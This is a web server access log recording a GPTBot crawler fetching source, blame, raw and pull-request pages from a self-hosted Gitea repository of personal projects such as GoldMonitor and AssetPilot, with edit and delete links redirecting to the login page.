"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version?display=source" [Client 74.7.227.38] [Length 10985] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" -[17/Feb/2026:17:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old?display=source" [Client 74.7.227.38] [Length 16611] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv?display=source" [Client 74.7.227.38] [Length 11377] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" -[17/Feb/2026:17:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe?display=rendered" [Client 74.7.227.38] [Length 10849] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe" -[17/Feb/2026:17:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:17:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 11290] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33696] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33389] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33683] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33685] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:27:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:27:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 10242] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 12489] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode" -[17/Feb/2026:17:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 74.7.227.38] [Length 21147] [Gzip 6.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:17:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72036] [Gzip 33.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11374] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11374] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:27:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:27:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 9812] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:17:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 11841] [Gzip 4.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:17:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 1127] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:17:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 880] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:17:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11343] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:27:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:27:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11374] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11374] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 